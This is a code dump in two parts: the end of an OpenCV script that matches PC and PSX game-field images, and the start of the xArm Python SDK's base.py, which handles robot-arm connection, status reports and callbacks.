ret, layers_PSX = cv2.imreadmulti(filename = psx_infos[potential_field][camera]["img"], flags = cv2.IMREAD_UNCHANGED )
for i in range(0, len(layers_PC)):
layer_psx = cv2.resize(layers_PSX[i], (0,0), fx=2.0, fy=2.0, interpolation = cv2.INTER_NEAREST)
difference = cv2.subtract(layers_PC[i], layer_psx)
meanDiff = cv2.mean(difference)
meanImg = meanImg +( meanDiff[0] + meanDiff[1] + meanDiff[2])
if(meanImg < minMean):
betterField = potential_field
minMean = meanImg
potential_matchs.clear()
potential_matchs=[betterField]
cam_result[camera] = potential_matchs[0]
return_dict[field] = cam_result
def chunks(l, n):
n = max(1, n)
return (l[i:i+n] for i in range(0, len(l), n))
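# e.g. list(chunks([1, 2, 3, 4, 5], 2)) -> [[1, 2], [3, 4], [5]]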
if __name__ == '__main__':
if os.path.exists("Unique_Fields_PC.json") == False:
pc_infos = check_duplicate_main(PC_INFO_LIST, "Unique_Fields_PC.json")
else:
with open("Unique_Fields_PC.json", "r") as read_file:
pc_infos = json.load(read_file)
if os.path.exists("Unique_Fields_PSX.json") == False:
psx_infos = check_duplicate_main(PSX_INFO_LIST, "Unique_Fields_PSX.json")
else:
with open("Unique_Fields_PSX.json", "r") as read_file:
psx_infos = json.load(read_file)
# Now, we try to match PC images with PSX images.
fields_list = list(pc_infos.keys())
split = np.array_split(fields_list, NUM_THREADS)
manager = Manager()
return_dict = manager.dict()
processes = []
for fields in split:
p = Process(target=match_psx_pc, args=(fields, pc_infos, psx_infos, return_dict))
processes.append(p)
for process in processes:
process.start()
for process in processes:
process.join()
# save all the infos in the json matching file.
with open("match_PC_PSX.json", "w") as write_file:
json.dump(return_dict.copy(), write_file, indent=4)
|
base.py
|
#!/usr/bin/env python3
# Software License Agreement (BSD License)
#
# Copyright (c) 2020, UFACTORY, Inc.
# All rights reserved.
#
# Author: Vinman <vinman.wen@ufactory.cc> <vinman.cub@gmail.com>
import re
import time
import math
import threading
from .events import Events
from ..core.config.x_config import XCONF
from ..core.comm import SerialPort, SocketPort
from ..core.wrapper import UxbusCmdSer, UxbusCmdTcp
from ..core.utils.log import logger, pretty_print
from ..core.utils import convert
from ..core.config.x_code import ControllerWarn, ControllerError, ControllerErrorCodeMap, ControllerWarnCodeMap
from .utils import xarm_is_connected, compare_time, compare_version, xarm_is_not_simulation_mode
from .code import APIState
controller_error_keys = ControllerErrorCodeMap.keys()
controller_warn_keys = ControllerWarnCodeMap.keys()
class Base(Events):
def __init__(self, port=None, is_radian=False, do_not_open=False, **kwargs):
if kwargs.get('init', False):
super(Base, self).__init__()
self._port = port
self._debug = kwargs.get('debug', False)
self._baudrate = kwargs.get('baudrate', XCONF.SerialConf.SERIAL_BAUD)
self._timeout = kwargs.get('timeout', None)
self._filters = kwargs.get('filters', None)
self._enable_heartbeat = kwargs.get('enable_heartbeat', False)
self._enable_report = kwargs.get('enable_report', True)
self._report_type = kwargs.get('report_type', 'rich')
self._check_tcp_limit = kwargs.get('check_tcp_limit', False)
self._check_joint_limit = kwargs.get('check_joint_limit', True)
self._check_cmdnum_limit = kwargs.get('check_cmdnum_limit', True)
self._check_simulation_mode = kwargs.get('check_simulation_mode', True)
self._max_cmd_num = kwargs.get('max_cmdnum', 512)
if not isinstance(self._max_cmd_num, int):
self._max_cmd_num = 512
self._max_cmd_num = min(XCONF.MAX_CMD_NUM, self._max_cmd_num)
self._check_robot_sn = kwargs.get('check_robot_sn', False)
self._check_is_ready = kwargs.get('check_is_ready', True)
self._check_is_pause = kwargs.get('check_is_pause', True)
self._timed_comm = kwargs.get('timed_comm', True)
self._timed_comm_interval = kwargs.get('timed_comm_interval', 180)
self._timed_comm_t = None
self._timed_comm_t_alive = False
self._min_tcp_speed, self._max_tcp_speed = 0.1, 1000 # mm/s
self._min_tcp_acc, self._max_tcp_acc = 1.0, 50000 # mm/s^2
self._tcp_jerk = 1000 # mm/s^3
self._min_joint_speed, self._max_joint_speed = 0.01, 4.0 # rad/s
self._min_joint_acc, self._max_joint_acc = 0.01, 20.0 # rad/s^2
self._joint_jerk = 20.0 # rad/s^3
self._rot_jerk = 2.3
self._max_rot_acc = 2.7
self._stream_type = 'serial'
self._stream = None
self.arm_cmd = None
self._stream_report = None
self._report_thread = None
self._only_report_err_warn_changed = True
self._last_position = [201.5, 0, 140.5, 3.1415926, 0, 0] # [x(mm), y(mm), z(mm), roll(rad), pitch(rad), yaw(rad)]
self._last_angles = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0] # [servo_1(rad), servo_2(rad), servo_3(rad), servo_4(rad), servo_5(rad), servo_6(rad), servo_7(rad)]
self._last_tcp_speed = 100 # mm/s, rad/s
self._last_tcp_acc = 2000 # mm/s^2, rad/s^2
self._last_joint_speed = 0.3490658503988659 # 20 °/s
self._last_joint_acc = 8.726646259971648 # 500 °/s^2
self._mvtime = 0
self._version = None
self._robot_sn = None
self._position = [201.5, 0, 140.5, 3.1415926, 0, 0]
self._angles = [0] * 7
self._position_offset = [0] * 6
self._world_offset = [0] * 6
self._state = 4
self._mode = 0
self._joints_torque = [0, 0, 0, 0, 0, 0, 0] # joint torques
self._tcp_load = [0, [0, 0, 0]] # payload [weight, center of mass], [weight, [x, y, z]]
self._collision_sensitivity = 0 # collision sensitivity
self._teach_sensitivity = 0 # teach sensitivity
self._error_code = 0
self._warn_code = 0
self._servo_codes = [[0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0]]
self._cmd_num = 0
self._arm_type = XCONF.Robot.Type.XARM7_X4
self._arm_axis = XCONF.Robot.Axis.XARM7
axis = kwargs.get('axis', self._arm_axis)
if axis in [5, 6, 7]:
self._arm_axis = axis
arm_type = kwargs.get('type', self._arm_type)
if arm_type in [3, 5, 6, 7, 8]:
self._arm_type = arm_type
self._arm_master_id = 0
self._arm_slave_id = 0
self._arm_motor_tid = 0
self._arm_motor_fid = 0
self._arm_motor_brake_states = [-1, -1, -1, -1, -1, -1, -1, -1] # [motor-1-brake-state, ..., motor-7-brake, reserved]
self._arm_motor_enable_states = [-1, -1, -1, -1, -1, -1, -1, -1] # [motor-1-enable-state, ..., motor-7-enable, reserved]
self._gravity_direction = [0, 0, -1]
self._is_ready = False
self._is_sync = False
self._is_first_report = True
self._first_report_over = False
self._default_is_radian = is_radian
self._sleep_finish_time = time.time()
self._is_old_protocol = False
self._major_version_number = 0 # firmware major version number
self._minor_version_number = 0 # firmware minor version number
self._revision_version_number = 0 # firmware revision version number
self._temperatures = [0, 0, 0, 0, 0, 0, 0]
self._voltages = [0, 0, 0, 0, 0, 0, 0]
self._currents = [0, 0, 0, 0, 0, 0, 0]
self._is_set_move = False
self._cond_pause = threading.Condition()
self._realtime_tcp_speed = 0
self._realtime_joint_speeds = [0, 0, 0, 0, 0, 0, 0]
self._count = -1
self._last_report_time = time.time()
self._max_report_interval = 0
self._cgpio_reset_enable = 0
self._tgpio_reset_enable = 0
self._cgpio_states = [0, 0, 256, 65533, 0, 65280, 0, 0, 0.0, 0.0, [0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0]]
self._ignore_error = False
self._ignore_state = False
self.modbus_baud = -1
self.gripper_is_enabled = False
self.gripper_speed = 0
self.gripper_version_numbers = [-1, -1, -1]
self.bio_gripper_is_enabled = False
self.bio_gripper_speed = 0
self.bio_gripper_error_code = 0
self.robotiq_is_activated = False
self._cmd_timeout = XCONF.UxbusConf.SET_TIMEOUT / 1000
self._is_collision_detection = 1
self._collision_tool_type = 0
self._collision_tool_params = [0, 0, 0, 0, 0, 0]
self._is_simulation_robot = False
self._last_update_err_time = 0
self._last_update_state_time = 0
self._last_update_cmdnum_time = 0
if not do_not_open:
self.connect()
def _init(self):
self._last_position = [201.5, 0, 140.5, 3.1415926, 0, 0] # [x(mm), y(mm), z(mm), roll(rad), pitch(rad), yaw(rad)]
self._last_angles = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0] # [servo_1(rad), servo_2(rad), servo_3(rad), servo_4(rad), servo_5(rad), servo_6(rad), servo_7(rad)]
self._last_tcp_speed = 100 # mm/s, rad/s
self._last_tcp_acc = 2000 # mm/s^2, rad/s^2
self._last_joint_speed = 0.3490658503988659 # 20 °/s
self._last_joint_acc = 8.726646259971648 # 500 °/s^2
self._mvtime = 0
self._version = None
self._robot_sn = None
self._position = [201.5, 0, 140.5, 3.1415926, 0, 0]
self._angles = [0] * 7
self._position_offset = [0] * 6
self._world_offset = [0] * 6
self._state = 4
self._mode = 0
self._joints_torque = [0, 0, 0, 0, 0, 0, 0] # joint torques
self._tcp_load = [0, [0, 0, 0]] # payload [weight, center of mass], [weight, [x, y, z]]
self._collision_sensitivity = 0 # collision sensitivity
self._teach_sensitivity = 0 # teach sensitivity
self._error_code = 0
self._warn_code = 0
self._servo_codes = [[0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0]]
self._cmd_num = 0
self._arm_master_id = 0
self._arm_slave_id = 0
self._arm_motor_tid = 0
self._arm_motor_fid = 0
self._arm_motor_brake_states = [-1, -1, -1, -1, -1, -1, -1,
-1] # [motor-1-brake-state, ..., motor-7-brake, reserved]
self._arm_motor_enable_states = [-1, -1, -1, -1, -1, -1, -1,
-1] # [motor-1-enable-state, ..., motor-7-enable, reserved]
self._gravity_direction = [0, 0, -1]
self._is_ready = False
self._is_sync = False
self._is_first_report = True
self._first_report_over = False
self._sleep_finish_time = time.time()
self._is_old_protocol = False
self._major_version_number = 0 # firmware major version number
self._minor_version_number = 0 # firmware minor version number
self._revision_version_number = 0 # firmware revision version number
self._temperatures = [0, 0, 0, 0, 0, 0, 0]
self._voltages = [0, 0, 0, 0, 0, 0, 0]
self._currents = [0, 0, 0, 0, 0, 0, 0]
self._is_set_move = False
self._cond_pause = threading.Condition()
self._realtime_tcp_speed = 0
self._realtime_joint_speeds = [0, 0, 0, 0, 0, 0, 0]
self._count = -1
self._last_report_time = time.time()
self._max_report_interval = 0
self._cgpio_reset_enable = 0
self._tgpio_reset_enable = 0
self._cgpio_states = [0, 0, 256, 65533, 0, 65280, 0, 0, 0.0, 0.0, [0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]]
self._ignore_error = False
self._ignore_state = False
self.modbus_baud = -1
self.gripper_is_enabled = False
self.gripper_speed = 0
self.gripper_version_numbers = [-1, -1, -1]
self.bio_gripper_is_enabled = False
self.bio_gripper_speed = 0
self.bio_gripper_error_code = 0
self.robotiq_is_activated = False
self._cmd_timeout = XCONF.UxbusConf.SET_TIMEOUT / 1000
self._is_collision_detection = 1
self._collision_tool_type = 0
self._collision_tool_params = [0, 0, 0, 0, 0, 0]
self._is_simulation_robot = False
self._last_update_err_time = 0
self._last_update_state_time = 0
self._last_update_cmdnum_time = 0
@staticmethod
def log_api_info(msg, *args, code=0, **kwargs):
if code == 0:
logger.info(msg, *args, **kwargs)
else:
logger.error(msg, *args, **kwargs)
def _check_version(self, is_first=False):
if is_first:
self._version = None
self._robot_sn = None
try:
if not self._version:
self.get_version()
if is_first:
count = 2
while not self._version and count:
self.get_version()
time.sleep(0.1)
count -= 1
if self._version and isinstance(self._version, str):
pattern = re.compile(
r'.*[vV](\d+)\.(\d+)\.(\d+),[vV](\d+)\.(\d+)\.(\d+),[vV](\d+)\.(\d+)\.(\d+),(\d+),(\d+)')
m = re.match(pattern, self._version)
if m:
(arg1, arg2, arg3, arg4, arg5, arg6,
self._major_version_number,
self._minor_version_number,
self._revision_version_number,
arg10, arg11) = map(int, m.groups())
pass
else:
pattern = re.compile(r'.*[vV](\d+)\.(\d+)\.(\d+)')
m = re.match(pattern, self._version)
if m:
(self._major_version_number,
self._minor_version_number,
self._revision_version_number) = map(int, m.groups())
else:
version_date = '-'.join(self._version.split('-')[-3:])
self._is_old_protocol = compare_time('2019-02-01', version_date)
if self._is_old_protocol:
self._major_version_number = 0
self._minor_version_number = 0
self._revision_version_number = 1
else:
self._major_version_number = 0
self._minor_version_number = 1
self._revision_version_number = 0
if is_first:
if self._check_robot_sn:
count = 2
while not self._robot_sn and count and self.warn_code == 0:
self.get_robot_sn()
self.get_err_warn_code()
if not self._robot_sn and self.warn_code == 0 and count:
time.sleep(0.1)
count -= 1
if self.warn_code != 0:
self.clean_warn()
print('is_old_protocol: {}'.format(self._is_old_protocol))
print('version_number: {}.{}.{}'.format(self._major_version_number, self._minor_version_number,
self._revision_version_number))
except Exception as e:
print('compare_time: {}, {}'.format(self._version, e))
@property
def version_is_ge_1_5_20(self):
if self._version is None:
self._check_version()
return self._major_version_number > 1 or (
self._major_version_number == 1 and self._minor_version_number > 5) or (
self._major_version_number == 1 and self._minor_version_number == 5 and self._revision_version_number >= 20)
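# e.g. firmware versions 1.5.20, 1.6.0 and 2.0.0 satisfy this check; 1.5.19 does not.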
@property
def version_is_ge_1_2_11(self):
if self._version is None:
self._check_version()
return self._major_version_number > 1 or (
self._major_version_number == 1 and self._minor_version_number > 2) or (
self._major_version_number == 1 and self._minor_version_number == 2 and self._revision_version_number >= 11)
@property
def realtime_tcp_speed(self):
return self._realtime_tcp_speed
@property
def realtime_joint_speeds(self):
return [speed if self._default_is_radian else math.degrees(speed) for speed in self._realtime_joint_speeds]
@property
def version_number(self):
return self._major_version_number, self._minor_version_number, self._revision_version_number
@property
def connected(self):
return self._stream and self._stream.connected
@property
def ready(self):
return self._is_ready
@property
def default_is_radian(self):
return self._default_is_radian
@property
def is_simulation_robot(self):
return self._is_simulation_robot
def check_is_simulation_robot(self):
return self._check_simulation_mode and self.is_simulation_robot
# return self._check_simulation_mode and self.mode != 4
@property
def version(self):
if not self._version:
self.get_version()
return self._version
# return 'v' + '.'.join(map(str, self.version_number))
@property
def sn(self):
return self._robot_sn
@property
def position(self):
if not self._enable_report:
self.get_position()
return [math.degrees(self._position[i]) if 2 < i < 6 and not self._default_is_radian
else self._position[i] for i in range(len(self._position))]
@property
def tcp_jerk(self):
return self._tcp_jerk
@property
def tcp_speed_limit(self):
return [self._min_tcp_speed, self._max_tcp_speed]
@property
def tcp_acc_limit(self):
return [self._min_tcp_acc, self._max_tcp_acc]
@property
def last_used_position(self):
return [math.degrees(self._last_position[i]) if 2 < i < 6 and not self._default_is_radian
else self._last_position[i] for i in range(len(self._last_position))]
@property
def last_used_tcp_speed(self):
return self._last_tcp_speed
@property
def last_used_tcp_acc(self):
return self._last_tcp_acc
@property
def angles(self):
if not self._enable_report:
self.get_servo_angle()
return [angle if self._default_is_radian else math.degrees(angle) for angle in self._angles]
@property
def joint_jerk(self):
return self._joint_jerk if self._default_is_radian else math.degrees(self._joint_jerk)
@property
def joint_speed_limit(self):
limit = [self._min_joint_speed, self._max_joint_speed]
if not self._default_is_radian:
limit = [math.degrees(i) for i in limit]
return limit
@property
def joint_acc_limit(self):
limit = [self._min_joint_acc, self._max_joint_acc]
if not self._default_is_radian:
limit = [math.degrees(i) for i in limit]
return limit
@property
def last_used_angles(self):
return [angle if self._default_is_radian else math.degrees(angle) for angle in self._last_angles]
@property
def last_used_joint_speed(self):
return self._last_joint_speed if self._default_is_radian else math.degrees(self._last_joint_speed)
@property
def last_used_joint_acc(self):
return self._last_joint_acc if self._default_is_radian else math.degrees(self._last_joint_acc)
@property
def position_offset(self):
return [math.degrees(self._position_offset[i]) if 2 < i < 6 and not self._default_is_radian
else self._position_offset[i] for i in range(len(self._position_offset))]
@property
def world_offset(self):
return [math.degrees(self._world_offset[i]) if 2 < i < 6 and not self._default_is_radian
else self._world_offset[i] for i in range(len(self._world_offset))]
@property
def state(self):
if not self._enable_report:
self.get_state()
return self._state
@property
def mode(self):
return self._mode
@property
def joints_torque(self):
return self._joints_torque
@property
def tcp_load(self):
return self._tcp_load
@property
def collision_sensitivity(self):
return self._collision_sensitivity
@property
def teach_sensitivity(self):
return self._teach_sensitivity
@property
def motor_brake_states(self):
return self._arm_motor_brake_states
@property
def motor_enable_states(self):
return self._arm_motor_enable_states
@property
def temperatures(self):
return self._temperatures
@property
def error_code(self):
if not self._enable_report:
self.get_err_warn_code()
return self._error_code
@property
def warn_code(self):
if not self._enable_report:
self.get_err_warn_code()
return self._warn_code
@property
def has_error(self):
return self.error_code != 0
@property
def has_warn(self):
return self.warn_code != 0
@property
def has_err_warn(self):
return self.has_error or self._warn_code != 0 or (self.arm_cmd and self.arm_cmd.has_err_warn)
@property
def cmd_num(self):
if not self._enable_report:
self.get_cmdnum()
return self._cmd_num
@property
def device_type(self):
return self._arm_type
@property
def axis(self):
return self._arm_axis
@property
def master_id(self):
return self._arm_master_id
@property
def slave_id(self):
return self._arm_slave_id
@property
def motor_tid(self):
return self._arm_motor_tid
@property
def motor_fid(self):
return self._arm_motor_fid
@property
def gravity_direction(self):
return self._gravity_direction
@property
def gpio_reset_config(self):
return [self._cgpio_reset_enable, self._tgpio_reset_enable]
@property
def count(self):
return self._count
@property
def servo_codes(self):
return self._servo_codes
@property
def is_stop(self):
return self.state in [4, 5]
@property
def voltages(self):
return self._voltages
@property
def currents(self):
return self._currents
@property
def cgpio_states(self):
return self._cgpio_states
@property
def self_collision_params(self):
return [self._is_collision_detection, self._collision_tool_type, self._collision_tool_params]
def check_is_pause(self):
if self._check_is_pause:
if self.state == 3 and self._enable_report:
with self._cond_pause:
self._cond_pause.wait()
@property
def state_is_ready(self):
if self._check_is_ready and not self.version_is_ge_1_5_20:
return self.ready
else:
return True
def _timed_comm_thread(self):
self._timed_comm_t_alive = True
while self.connected and self._timed_comm_t_alive:
try:
self.get_cmdnum()
except:
pass
count = self._timed_comm_interval * 10
while count > 0:
count -= 1
time.sleep(0.1)
if not self._timed_comm_t_alive or not self.connected:
break
def connect(self, port=None, baudrate=None, timeout=None, axis=None, arm_type=None):
if self.connected:
return
if axis in [5, 6, 7]:
self._arm_axis = axis
if arm_type in [3, 5, 6, 7]:
self._arm_type = arm_type
self._is_ready = True
self._port = port if port is not None else self._port
self._baudrate = baudrate if baudrate is not None else self._baudrate
self._timeout = timeout if timeout is not None else self._timeout
if not self._port:
raise Exception('cannot connect to port/ip {}'.format(self._port))
if self._timed_comm_t is not None:
try:
self._timed_comm_t_alive = False
self._timed_comm_t.join()
self._timed_comm_t = None
except:
pass
self._is_first_report = True
self._first_report_over = False
self._init()
if isinstance(self._port, (str, bytes)):
if self._port == 'localhost' or re.match(
r"^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$",
self._port):
self._stream = SocketPort(self._port, XCONF.SocketConf.TCP_CONTROL_PORT,
heartbeat=self._enable_heartbeat,
buffer_size=XCONF.SocketConf.TCP_CONTROL_BUF_SIZE)
if not self.connected:
raise Exception('connect socket failed')
try:
if self._timed_comm:
self._timed_comm_t = threading.Thread(target=self._timed_comm_thread, daemon=True)
self._timed_comm_t.start()
except:
pass
self._report_error_warn_changed_callback()
self.arm_cmd = UxbusCmdTcp(self._stream)
self._stream_type = 'socket'
self._stream_report = None
try:
self._connect_report()
except:
self._stream_report = None
self._check_version(is_first=True)
self.arm_cmd.set_debug(self._debug)
if self._stream.connected and self._enable_report:
if self._is_old_protocol:
self._report_thread = threading.Thread(target=self._report_thread_handle_old, daemon=True)
else:
self._report_thread = threading.Thread(target=self._report_thread_handle, daemon=True)
self._report_thread.start()
self._report_connect_changed_callback()
else:
self._stream = SerialPort(self._port)
if not self.connected:
raise Exception('connect serial failed')
self._report_error_warn_changed_callback()
self.arm_cmd = UxbusCmdSer(self._stream)
self._stream_type = 'serial'
if self._enable_report:
self._report_thread = threading.Thread(target=self._auto_get_report_thread, daemon=True)
self._report_thread.start()
self._report_connect_changed_callback(True, True)
else:
self._report_connect_changed_callback(True, False)
self._check_version(is_first=True)
self.arm_cmd.set_debug(self._debug)
self.set_timeout(self._cmd_timeout)
def disconnect(self):
try:
self._stream.close()
except:
pass
if self._stream_report:
try:
self._stream_report.close()
except:
pass
self._is_ready = False
try:
self._stream.join()
except:
pass
if self._stream_report:
try:
self._stream_report.join()
except:
pass
self._report_connect_changed_callback(False, False)
with self._cond_pause:
self._cond_pause.notify_all()
def set_timeout(self, timeout):
self._cmd_timeout = timeout
if self.arm_cmd is not None:
self._cmd_timeout = self.arm_cmd.set_timeout(self._cmd_timeout)
return self._cmd_timeout
# def _check_version(self):
# self._version = None
# self._robot_sn = None
# try:
# count = 2
# while not self._version and count:
# self.get_version()
# time.sleep(0.1)
# count -= 1
# if self._version and isinstance(self._version, str):
# pattern = re.compile(r'.*[vV](\d+)\.(\d+)\.(\d+)')
# m = re.match(pattern, self._version)
# if m:
# self._major_version_number, self._minor_version_number, self._revision_version_number = map(int,
# m.groups())
# else:
# version_date = '-'.join(self._version.split('-')[-3:])
# self._is_old_protocol = compare_time('2019-02-01', version_date)
# if self._is_old_protocol:
# self._major_version_number = 0
# self._minor_version_number = 0
# self._revision_version_number = 1
# else:
# self._major_version_number = 0
# self._minor_version_number = 1
# self._revision_version_number = 0
# if self._check_robot_sn:
# count = 2
# while not self._robot_sn and count and self.warn_code == 0:
# self.get_robot_sn()
# self.get_err_warn_code()
# if not self._robot_sn and self.warn_code == 0 and count:
# time.sleep(0.1)
# count -= 1
# if self.warn_code != 0:
# self.clean_warn()
# print('is_old_protocol: {}'.format(self._is_old_protocol))
# print('version_number: {}.{}.{}'.format(self._major_version_number, self._minor_version_number,
# self._revision_version_number))
# except Exception as e:
# print('compare_time: {}, {}'.format(self._version, e))
def _connect_report(self):
if self._enable_report:
if self._stream_report:
try:
self._stream_report.close()
except:
pass
time.sleep(2)
if self._report_type == 'real':
self.__connect_report_real()
elif self._report_type == 'normal':
self.__connect_report_normal()
else:
self.__connect_report_rich()
def __connect_report_normal(self):
if self._stream_type == 'socket':
self._stream_report = SocketPort(self._port, XCONF.SocketConf.TCP_REPORT_NORM_PORT,
buffer_size=XCONF.SocketConf.TCP_REPORT_NORMAL_BUF_SIZE
if not self._is_old_protocol else 87)
def __connect_report_rich(self):
if self._stream_type == 'socket':
self._stream_report = SocketPort(self._port, XCONF.SocketConf.TCP_REPORT_RICH_PORT,
buffer_size=1024 if not self._is_old_protocol else 187)
def __connect_report_real(self):
if self._stream_type == 'socket':
self._stream_report = SocketPort(self._port, XCONF.SocketConf.TCP_REPORT_REAL_PORT,
buffer_size=1024 if not self._is_old_protocol else 87)
def _report_connect_changed_callback(self, main_connected=None, report_connected=None):
if self.REPORT_CONNECT_CHANGED_ID in self._report_callbacks.keys():
for callback in self._report_callbacks[self.REPORT_CONNECT_CHANGED_ID]:
try:
callback({
'connected': self._stream and self._stream.connected if main_connected is None else main_connected,
'reported': self._stream_report and self._stream_report.connected if report_connected is None else report_connected,
})
except Exception as e:
logger.error('connect changed callback: {}'.format(e))
def _report_state_changed_callback(self):
if self._ignore_state:
return
if self.REPORT_STATE_CHANGED_ID in self._report_callbacks.keys():
for callback in self._report_callbacks[self.REPORT_STATE_CHANGED_ID]:
try:
callback({
'state': self._state
})
except Exception as e:
logger.error('state changed callback: {}'.format(e))
def _report_mode_changed_callback(self):
if self.REPORT_MODE_CHANGED_ID in self._report_callbacks.keys():
for callback in self._report_callbacks[self.REPORT_MODE_CHANGED_ID]:
try:
callback({
'mode': self._mode
})
except Exception as e:
logger.error('mode changed callback: {}'.format(e))
def _report_mtable_mtbrake_changed_callback(self):
if self.REPORT_MTABLE_MTBRAKE_CHANGED_ID in self._report_callbacks.keys():
mtable = [bool(i) for i in self._arm_motor_enable_states]
mtbrake = [bool(i) for i in self._arm_motor_brake_states]
for callback in self._report_callbacks[self.REPORT_MTABLE_MTBRAKE_CHANGED_ID]:
try:
callback({
'mtable': mtable.copy(),
'mtbrake': mtbrake.copy()
})
except Exception as e:
logger.error('mtable/mtbrake changed callback: {}'.format(e))
def _report_error_warn_changed_callback(self):
if self._ignore_error:
return
if self.REPORT_ERROR_WARN_CHANGED_ID in self._report_callbacks.keys():
for callback in self._report_callbacks[self.REPORT_ERROR_WARN_CHANGED_ID]:
try:
callback({
'warn_code': self._warn_code,
'error_code': self._error_code,
})
except Exception as e:
logger.error('error warn changed callback: {}'.format(e))
def _report_cmdnum_changed_callback(self):
if self.REPORT_CMDNUM_CHANGED_ID in self._report_callbacks.keys():
for callback in self._report_callbacks[self.REPORT_CMDNUM_CHANGED_ID]:
try:
callback({
'cmdnum': self._cmd_num,
})
except Exception as e:
logger.error('cmdnum changed callback: {}'.format(e))
def _report_temperature_changed_callback(self):
if self.REPORT_TEMPERATURE_CHANGED_ID in self._report_callbacks.keys():
for callback in self._report_callbacks[self.REPORT_TEMPERATURE_CHANGED_ID]:
try:
callback({
'temperatures': self.temperatures,
})
except Exception as e:
logger.error('temperature changed callback: {}'.format(e))
def _report_count_changed_callback(self):
if self.REPORT_COUNT_CHANGED_ID in self._report_callbacks.keys():
for callback in self._report_callbacks[self.REPORT_COUNT_CHANGED_ID]:
try:
callback({
'count': self._count
})
except Exception as e:
logger.error('count changed callback: {}'.format(e))
def _report_location_callback(self):
if self.REPORT_LOCATION_ID in self._report_callbacks.keys():
for item in self._report_callbacks[self.REPORT_LOCATION_ID]:
callback = item['callback']
ret = {}
if item['cartesian']:
ret['cartesian'] = self.position.copy()
if item['joints']:
ret['joints'] = self.angles.copy()
try:
callback(ret)
except Exception as e:
logger.error('location callback: {}'.format(e))
def _report_callback(self):
if self.REPORT_ID in self._report_callbacks.keys():
for item in self._report_callbacks[self.REPORT_ID]:
callback = item['callback']
ret = {}
if item['cartesian']:
ret['cartesian'] = self.position.copy()
if item['joints']:
ret['joints'] = self.angles.copy()
if item['error_code']:
ret['error_code'] = self._error_code
if item['warn_code']:
ret['warn_code'] = self._warn_code
if item['state']:
ret['state'] = self._state
if item['mtable']:
mtable = [bool(i) for i in self._arm_motor_enable_states]
ret['mtable'] = mtable.copy()
if item['mtbrake']:
mtbrake = [bool(i) for i in self._arm_motor_brake_states]
ret['mtbrake'] = mtbrake.copy()
if item['cmdnum']:
ret['cmdnum'] = self._cmd_num
try:
callback(ret)
except Exception as e:
logger.error('report callback: {}'.format(e))
def _report_thread_handle_old(self):
def __handle_report_normal(rx_data):
# print('length:', convert.bytes_to_u32(rx_data[0:4]))
state, mtbrake, mtable, error_code, warn_code = rx_data[4:9]
angles = convert.bytes_to_fp32s(rx_data[9:7 * 4 + 9], 7)
pose = convert.bytes_to_fp32s(rx_data[37:6 * 4 + 37], 6)
cmd_num = convert.bytes_to_u16(rx_data[61:63])
pose_offset = convert.bytes_to_fp32s(rx_data[63:6 * 4 + 63], 6)
if error_code != self._error_code or warn_code != self._warn_code:
if error_code != self._error_code:
self._error_code = error_code
if self._error_code != 0:
pretty_print('Error, code: {}'.format(self._error_code), color='red')
else:
pretty_print('Error has been cleared', color='blue')
if warn_code != self._warn_code:
self._warn_code = warn_code
if self._warn_code != 0:
pretty_print('Warn, code: {}'.format(self._warn_code), color='yellow')
else:
pretty_print('Warning has been cleared', color='blue')
self._report_error_warn_changed_callback()
logger.info('OnReport -> err={}, warn={}, state={}, cmdnum={}, mtbrake={}, mtable={}'.format(
error_code, warn_code, state, cmd_num, mtbrake, mtable
))
elif not self._only_report_err_warn_changed:
self._report_error_warn_changed_callback()
if cmd_num != self._cmd_num:
self._cmd_num = cmd_num
self._report_cmdnum_changed_callback()
if state != self._state:
self._state = state
self._report_state_changed_callback()
mtbrake = [mtbrake & 0x01, mtbrake >> 1 & 0x01, mtbrake >> 2 & 0x01, mtbrake >> 3 & 0x01,
mtbrake >> 4 & 0x01, mtbrake >> 5 & 0x01, mtbrake >> 6 & 0x01, mtbrake >> 7 & 0x01]
mtable = [mtable & 0x01, mtable >> 1 & 0x01, mtable >> 2 & 0x01, mtable >> 3 & 0x01,
mtable >> 4 & 0x01, mtable >> 5 & 0x01, mtable >> 6 & 0x01, mtable >> 7 & 0x01]
if mtbrake != self._arm_motor_brake_states or mtable != self._arm_motor_enable_states:
self._arm_motor_enable_states = mtable
self._arm_motor_brake_states = mtbrake
self._report_mtable_mtbrake_changed_callback()
if not self._is_first_report:
if state in [4, 5] or not all([bool(item[0] & item[1]) for item in zip(mtbrake, mtable)][:self.axis]):
# if self._is_ready:
# pretty_print('[report], xArm is not ready to move', color='red')
self._is_ready = False
else:
# if not self._is_ready:
# pretty_print('[report], xArm is ready to move', color='green')
self._is_ready = True
else:
self._is_ready = False
self._is_first_report = False
if not self._is_ready:
self._sleep_finish_time = 0
if error_code in [1, 10, 11, 12, 13, 14, 15, 16, 17, 19, 28]:
self.modbus_baud = -1
self.robotiq_is_activated = False
self.gripper_is_enabled = False
self.bio_gripper_is_enabled = False
self.bio_gripper_speed = 0
self.gripper_is_enabled = False
self.gripper_speed = 0
self.gripper_version_numbers = [-1, -1, -1]
self._error_code = error_code
self._warn_code = warn_code
self.arm_cmd.has_err_warn = error_code != 0 or warn_code != 0
_state = self._state
self._state = state
if _state == 3 and self.state != 3:
with self._cond_pause:
self._cond_pause.notify_all()
self._cmd_num = cmd_num
self._arm_motor_brake_states = mtbrake
self._arm_motor_enable_states = mtable
update_time = time.time()
self._last_update_cmdnum_time = update_time
self._last_update_state_time = update_time
self._last_update_err_time = update_time
for i in range(len(pose)):
if i < 3:
pose[i] = float('{:.3f}'.format(pose[i]))
# pose[i] = float('{:.3f}'.format(pose[i][0]))
else:
pose[i] = float('{:.6f}'.format(pose[i]))
# pose[i] = float('{:.6f}'.format(pose[i][0]))
for i in range(len(angles)):
angles[i] = float('{:.6f}'.format(angles[i]))
# angles[i] = float('{:.6f}'.format(angles[i][0]))
for i in range(len(pose_offset)):
if i < 3:
pose_offset[i] = float('{:.3f}'.format(pose_offset[i]))
# pose_offset[i] = float('{:.3f}'.format(pose_offset[i][0]))
else:
